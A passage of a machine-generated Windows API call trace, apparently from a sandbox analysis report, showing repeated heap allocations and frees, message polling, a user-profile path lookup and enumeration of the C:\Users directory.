0x3466428 [0228.449] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.449] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5ee8 | out: hHeap=0x620000) returned 1 [0228.449] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.449] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.449] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.449] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5ee8 | out: hHeap=0x620000) returned 1 [0228.449] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.449] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.449] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.449] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5ee8 | out: hHeap=0x620000) returned 1 [0228.449] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.449] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.449] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.449] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5ee8 | out: hHeap=0x620000) returned 1 [0228.449] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.450] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.450] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.450] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5ee8 | out: hHeap=0x620000) returned 1 [0228.450] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.450] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.450] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.450] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5ee8 | out: hHeap=0x620000) returned 1 [0228.450] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.450] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.450] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0228.450] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.450] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.450] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5ee8 | out: hHeap=0x620000) returned 1 [0228.450] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.450] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.450] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.450] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5ee8 | out: hHeap=0x620000) returned 1 [0228.450] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.450] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.450] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.450] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5ee8 | out: hHeap=0x620000) returned 1 [0228.450] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.450] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.450] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.450] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5ee8 | out: hHeap=0x620000) returned 1 [0228.450] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.450] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.450] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.450] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5ee8 | out: hHeap=0x620000) returned 1 [0228.450] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.451] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.451] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.451] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5ee8 | out: hHeap=0x620000) returned 1 [0228.451] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.451] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.451] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.451] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5ee8 | out: hHeap=0x620000) returned 1 [0228.451] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.451] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.451] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.451] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5ee8 | out: hHeap=0x620000) returned 1 [0228.451] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.451] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.451] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.451] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5ee8 | out: hHeap=0x620000) returned 1 [0228.451] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.451] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.451] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.451] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5ee8 | out: hHeap=0x620000) returned 1 [0228.451] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.451] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.451] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.451] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5ee8 | out: hHeap=0x620000) returned 1 [0228.451] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.451] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.451] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.451] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5ee8 | out: hHeap=0x620000) returned 1 [0228.451] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.451] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.451] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.451] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5ee8 | out: hHeap=0x620000) returned 1 [0228.452] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.452] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.452] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.452] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5ee8 | out: hHeap=0x620000) returned 1 [0228.452] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.452] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.452] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.452] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5ee8 | out: hHeap=0x620000) returned 1 [0228.452] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c6618 | out: hHeap=0x620000) returned 1 [0228.452] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c6618 [0228.452] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.452] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.452] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.452] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.452] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5ee8 | out: hHeap=0x620000) returned 1 [0228.452] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.452] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.452] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.452] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5ee8 | out: hHeap=0x620000) returned 1 [0228.452] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.452] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.452] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.452] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5ee8 | out: hHeap=0x620000) returned 1 [0228.452] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.452] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.452] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.452] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5ee8 | out: hHeap=0x620000) returned 1 [0228.452] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.452] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.452] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.453] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5ee8 | out: hHeap=0x620000) returned 1 [0228.453] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.453] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.453] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.453] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5ee8 | out: hHeap=0x620000) returned 1 [0228.453] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.453] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.453] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0228.453] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.453] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.453] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5ee8 | out: hHeap=0x620000) returned 1 [0228.453] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.453] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.453] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.453] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5ee8 | out: hHeap=0x620000) returned 1 [0228.453] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.453] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.453] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.453] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5ee8 | out: hHeap=0x620000) returned 1 [0228.453] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.453] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.453] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.453] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5ee8 | out: hHeap=0x620000) returned 1 [0228.453] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.453] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.453] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.453] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5ee8 | out: hHeap=0x620000) returned 1 [0228.453] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.453] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.453] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.453] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5ee8 | out: hHeap=0x620000) returned 1 [0228.454] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.454] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.454] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.454] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5ee8 | out: hHeap=0x620000) returned 1 [0228.454] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c6618 | out: hHeap=0x620000) returned 1 [0228.454] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c19c8 [0228.454] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.454] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c18e8 [0228.454] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.454] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.454] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18e8 | out: hHeap=0x620000) returned 1 [0228.454] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c18e8 [0228.454] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.454] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.454] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18e8 | out: hHeap=0x620000) returned 1 [0228.454] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c18e8 [0228.454] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.454] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.454] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18e8 | out: hHeap=0x620000) returned 1 [0228.454] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c18e8 [0228.454] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.454] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.454] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18e8 | out: hHeap=0x620000) returned 1 [0228.454] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c18e8 [0228.454] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.454] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.454] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18e8 | out: hHeap=0x620000) returned 1 [0228.454] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c18e8 [0228.454] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.455] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.455] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18e8 | out: hHeap=0x620000) returned 1 [0228.455] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c18e8 [0228.455] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.455] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.455] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.455] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.455] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.455] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.455] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0228.455] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5ee8 | out: hHeap=0x620000) returned 1 [0228.455] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.455] PathFindFileNameW (pszPath="") returned="" [0228.455] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75330000 [0228.456] GetProcAddress (hModule=0x75330000, lpProcName="SHGetFolderPathW") returned 0x753b5708 [0228.456] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b78058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0228.456] FreeLibrary (hLibModule=0x75330000) returned 1 [0228.456] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5f10 | out: hHeap=0x620000) returned 1 [0228.456] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.456] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b79528 | out: hHeap=0x620000) returned 1 [0228.456] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79528 [0228.456] FindFirstFileW (in: lpFileName="C:\\Users\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.456] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b79528 | out: hHeap=0x620000) returned 1 [0228.456] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0228.456] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 1 [0228.456] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7bd8 [0228.456] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7c68 [0228.456] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7cb0 [0228.456] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7c68 | out: hHeap=0x620000) returned 1 [0228.456] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7bd8 | out: hHeap=0x620000) returned 1 [0228.456] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0228.456] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c19c8 [0228.457] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c18e8 [0228.457] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c18b0 [0228.457] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18e8 | out: hHeap=0x620000) returned 1 [0228.457] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0228.457] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x62fa4a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Default", cAlternateFileName="")) returned 1 [0228.457] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c19c8 [0228.457] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c18e8 [0228.457] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1a00 [0228.457] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18e8 | out: hHeap=0x620000) returned 1 [0228.457] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0228.457] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Default User", cAlternateFileName="DEFAUL~1")) returned 1 [0228.457] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c19c8 [0228.457] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c18e8 [0228.457] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1a38 [0228.457] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18e8 | out: hHeap=0x620000) returned 1 [0228.457] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0228.457] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0228.457] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, 